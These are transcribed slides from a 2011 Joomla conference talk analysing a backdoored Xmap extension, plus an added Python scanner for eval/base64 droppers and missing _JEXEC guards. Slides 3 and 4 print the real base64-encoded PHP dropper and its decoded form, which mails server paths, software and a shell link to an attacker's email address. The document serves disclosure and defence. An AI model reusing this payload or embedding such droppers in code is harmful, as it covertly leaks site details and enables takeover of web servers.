Jira ICT - How safe are Joomla! extensions #jd11nl

How safe are Joomla! extensions #jd11nl
Joomladagen NL 2011


  1. How safe are Joomla extensions? @jd11nl. Case: Xmap. By Ray Bogman. Jira ICT www.jira.nl - @jiraict. Yireo www.yireo.com - @yireo
  2. Xmap jeopardized?
  3. Where are you jeopardized? install.xmap.php, slider.css.php
     <?php eval("?>".base64_decode("PD9waHANCiRraW1lPSJhbWVuc2VtaWhAZ21haWwuY29tIjsNCiRiYXNsaWs9IkVMX011SGFNTWVEIFNlcnZlciBBdmNpc2kgVjEuMCI7DQokRUxfTXVIYU1NZUQ9IkRvc3lhIFlvbHUgOiAiLiRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10uInJuIjsNCiRFTF9NdUhhTU1lRC49IlNlcnZlciBBZG1pbiA6ICIuJF9TRVJWRVJbJ1NFUlZFUl9BRE1JTiddLiJybiI7DQokRUxfTXVIYU1NZUQuPSJTZXJ2ZXIgaXNsZXRpbSBzaXN0ZW1pIDogIi4kX1NFUlZFUlsnU0VSVkVSX1NPRlRXQVJFJ10uInJuIjsNCiRFTF9NdUhhTU1lRC49IlNoZWxsIExpbmsgOiBodHRwOi8vIi4kX1NFUlZFUlsnU0VSVkVSX05BTUUnXS4kX1NFUlZFUlsnUEhQX1NFTEYnXS4icm4iOw0KJEVMX011SGFNTWVELj0iQXZsYW5hbiBTaXRlIDogIiAuJF9TRVJWRVJbJ0hUVFBfSE9TVCddLiJybiI7DQptYWlsKCRraW1lLCAkYmFzbGlrLCAkRUxfTXVIYU1NZUQpOw0KPz4=")); ?>
  4. Notifying the Hacker would be nice
     <?php
     // Decoded form of the base64 payload: mails the host's details to the attacker.
     $kime="amensemih@gmail.com";                      // recipient ("to whom")
     $baslik="EL_MuHaMMeD Server Avcisi V1.0";         // mail subject
     $EL_MuHaMMeD="Dosya Yolu : ".$_SERVER['DOCUMENT_ROOT']."rn";            // file path
     $EL_MuHaMMeD.="Server Admin : ".$_SERVER['SERVER_ADMIN']."rn";
     $EL_MuHaMMeD.="Server isletim sistemi : ".$_SERVER['SERVER_SOFTWARE']."rn";  // server software
     $EL_MuHaMMeD.="Shell Link : http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."rn";  // URL of this file
     $EL_MuHaMMeD.="Avlanan Site : " .$_SERVER['HTTP_HOST']."rn";            // affected site
     mail($kime, $baslik, $EL_MuHaMMeD);
     ?>
  5. So what's next?
  6. Is there a backdoor?
  7. Get your Joomla! login for Free!
  8. _JEXEC or die
     • com_agora.php
     • com_eventlist.php
     • com_glossary.php
     • com_joomgallery.php
     • com_kunena.php
     defined( '_JEXEC' ) or die( 'Restricted access.' ); missing in current version
  9. Thank you. ray@jira.nl #jiraict www.jira.nl http://www.slideshare.net/jiraict http://www.facebook.com/jiraict
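
A way to check an extension for the two problems shown on the slides, the eval(base64_decode(...)) dropper and PHP files missing the _JEXEC guard. This is an added example, not code from the presentation; the function names and the sample files are constructed for illustration.

```python
import base64
import re
from pathlib import Path

# Joomla's direct-access guard, e.g. defined('_JEXEC') or die('Restricted access');
GUARD = re.compile(r"""defined\s*\(\s*['"]_JEXEC['"]\s*\)\s*(?:or|\|\|)\s*(?:die|exit)\b""", re.I)
# eval(...) fed by base64_decode("<literal>"), the pattern on slide 3
EVAL_B64 = re.compile(r"""eval\s*\([^;]*?base64_decode\s*\(\s*['"]([A-Za-z0-9+/=\s]+)['"]""", re.I | re.S)


def scan_source(name, source):
    """Return (name, finding, detail) tuples for one PHP file's contents."""
    findings = []
    if "<?php" in source and not GUARD.search(source):
        findings.append((name, "missing-jexec-guard", ""))
    for match in EVAL_B64.finditer(source):
        try:
            # Decode the literal so the reviewer sees what eval() would run.
            decoded = base64.b64decode(match.group(1)).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError subclass
            decoded = "<undecodable>"
        findings.append((name, "eval-base64", decoded[:200]))
    return findings


def scan_tree(root):
    """Scan every .php file under root (an unpacked extension directory)."""
    findings = []
    for path in sorted(Path(root).rglob("*.php")):
        findings += scan_source(str(path), path.read_text(errors="replace"))
    return findings


# Constructed samples, not taken from any real extension.
_PAYLOAD = base64.b64encode(b'<?php echo "constructed sample"; ?>').decode()
SAMPLES = {
    "guarded.php": "<?php\ndefined( '_JEXEC' ) or die( 'Restricted access.' );\necho 'ok';\n",
    "unguarded.php": "<?php\necho 'reachable by direct URL';\n",
    "dropper.php": '<?php eval("?>".base64_decode("%s")); ?>' % _PAYLOAD,
}

if __name__ == "__main__":
    for name, src in SAMPLES.items():
        for finding in scan_source(name, src):
            print(finding)
```

Entry points such as Joomla's own index.php define _JEXEC rather than check it, so they show up as missing-jexec-guard and need a manual look.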
